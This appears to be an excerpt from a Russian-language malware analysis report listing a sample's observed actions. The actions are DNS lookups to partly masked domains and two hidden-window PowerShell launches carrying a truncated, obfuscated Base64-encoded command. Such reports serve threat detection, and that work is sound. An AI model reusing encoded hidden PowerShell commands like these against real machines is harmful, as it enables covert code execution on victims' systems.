Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAGEAcgBrAGUAdABpAG4AZwBmAHMAYwA9ACcATABlAG8AbgBlAG0AdQBwACcAOwAkAGMAbwBtAHAAcgBlAHMAcwBqAHoAZgA...
- DNS ASK go####luciones.com
- DNS ASK me####balagens.com
- DNS ASK bl##.dakkha.com
- DNS ASK ep####reparfum.com
- DNS ASK be###nmotor.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAGEAcgBrAGUAdABpAG4AZwBmAHMAYwA9ACcATABlAG8AbgBlAG0AdQBwACcAOwAkAGMAbwBtAHAAcgBlAHMAcwBqAHoAZgA...' (со скрытым окном)